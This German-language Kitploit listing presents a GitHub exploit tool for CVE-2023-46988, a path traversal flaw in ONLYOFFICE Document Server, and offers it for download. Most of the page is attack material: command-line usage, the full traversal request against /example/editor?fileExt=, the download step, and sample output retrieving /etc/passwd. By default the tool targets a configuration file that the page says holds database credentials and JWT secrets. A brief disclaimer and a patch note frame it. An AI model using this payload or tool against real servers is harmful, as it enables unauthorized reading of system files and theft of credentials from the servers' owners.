Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
OnlyOffice-path-traversal — CVE-2023-46988: ONLYOFFICE Path-Traversal-Exploit | Kitploit
Tools/GitHubGitHub/mihat2/onlyoffice-path-traversal
SchwachstellenanalyseExploitationWebanwendungs-ExploitationInformationsbeschaffungPenetrationstestsLernen & Bildung
GitHubmihat2/onlyoffice-path-traversal

OnlyOffice-path-traversal

CVE-2023-46988: ONLYOFFICE Path-Traversal-Exploit

Repository anzeigen
vor 1 JahrNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

ONLYOFFICE Path-Traversal-Exploit (CVE-2023-46988)

📌 Überblick

Dieses Skript nutzt eine Path-Traversal-Schwachstelle im ONLYOFFICE Document Server (CVE-2023-46988) aus, die es nicht autorisierten Benutzern ermöglicht, beliebige Dateien vom Server zu kopieren. Die Schwachstelle befindet sich im Endpunkt /example/editor, wobei der Parameter fileExt manipuliert werden kann, um auf sensible System- und Konfigurationsdateien zuzugreifen.

⚠️ Haftungsausschluss

Dieses Tool dient ausschließlich Bildungs- und autorisierten Sicherheitsforschungszwecken.
Die nicht autorisierte Nutzung gegen Systeme ohne ausdrückliche Genehmigung ist illegal und unethisch.

🛠 Funktionen

  • Standardmäßige sensible Dateien abrufen:
    • /etc/passwd
    • /etc/onlyoffice/documentserver/local.json (enthält )
Datenbank-Anmeldedaten & JWT-Geheimnisse
  • Beliebigen Dateipfad mit dem Argument --file angeben.
  • Unterstützt optionale Proxy-Nutzung zum Abfangen mit Burp Suite (--proxy).
  • Unterstützt optionale SSL-Überprüfung (--verify).
  • Behebt Kodierungsprobleme beim Herunterladen von Dateien mit Sonderzeichen.
  • 🚀 Verwendung

    1️⃣ Grundlegende Verwendung (Standarddateien abrufen)

    root@kitploit:~
    python onlyoffice_exploit.py http://localhost
    

    Dadurch werden folgende Dateien abgerufen:

    • /etc/passwd
    • /etc/onlyoffice/documentserver/local.json

    2️⃣ Eine benutzerdefinierte Datei abrufen (z. B. /etc/hosts)

    root@kitploit:~
    python onlyoffice_exploit.py http://localhost --file /etc/hosts
    

    3️⃣ Proxy aktivieren (z. B. Burp Suite auf 127.0.0.1:8080)

    root@kitploit:~
    python onlyoffice_exploit.py http://localhost --proxy
    
    root@kitploit:~
    python onlyoffice_exploit.py http://localhost --proxy http://127.0.0.1:8080
    

    4️⃣ SSL-Überprüfung aktivieren

    root@kitploit:~
    python onlyoffice_exploit.py https://example.local --verify
    

    5️⃣ Proxy und SSL-Überprüfung kombinieren

    root@kitploit:~
    python onlyoffice_exploit.py https://example.local --file /etc/hosts --proxy --verify
    

    🔍 So funktioniert es

    1. Sendet eine Anfrage an /example/editor mit einem bösartigen fileExt-Parameter:
      root@kitploit:~
      GET /example/editor?fileExt=../../../../../../../../etc/passwd
      
    2. Extrahiert die Weiterleitungs-URL aus der Antwort.
    3. Analysiert den weitergeleiteten Dateinamen aus der Antwort.
    4. Behebt Kodierungsprobleme für Sonderzeichen in Dateinamen.
    5. Lädt die Datei von /example/download?fileName=<extracted_filename> herunter.

    🛠 Beispielausgabe

    root@kitploit:~
    [*] Target URL: http://localhost
    [*] Attempting to retrieve: /etc/passwd
    [*] Sending request to: http://localhost/example/editor?fileExt=../../../../../../../../etc/passwd
    [+] Extracted Redirect URL: http://localhost/example/download?fileName=.passwd
    [+] Extracted File Name: .passwd
    [*] Downloading file: http://localhost/example/download?fileName=.passwd
    [+] File downloaded successfully: .passwd
    

    🔒 Gegenmaßnahmen

    ONLYOFFICE hat diese Schwachstelle im Update vom Februar 2024 behoben.
    Benutzer sollten auf die neueste Version aktualisieren, um ihre Server zu schützen.

    🐜 Lizenz

    Dieses Projekt ist unter der MIT-Lizenz lizenziert – siehe LICENSE für Details.

    Tool herunterladen